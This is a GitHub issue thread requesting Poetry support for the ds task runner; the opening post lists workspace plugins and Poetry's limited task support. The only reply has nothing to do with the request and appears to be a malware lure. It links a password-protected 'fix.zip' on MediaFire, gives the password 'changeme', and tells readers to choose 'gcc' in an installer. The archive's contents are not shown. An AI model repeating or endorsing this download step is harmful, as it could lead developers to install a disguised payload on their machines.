### ISSUE TITLE
add: support for poetry

### ISSUE THREAD

**Issue by metaist** [metaist/ds#82]
It has at least two conflicting plugins for workspaces:
- https://github.com/jacksmith15/poetry-workspace-plugin
- https://pypi.org/project/poetry-workspace-plugin2/

And it only supports one kind of task (a `call` with no arguments):
- https://python-poetry.org/docs/cli/#run

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
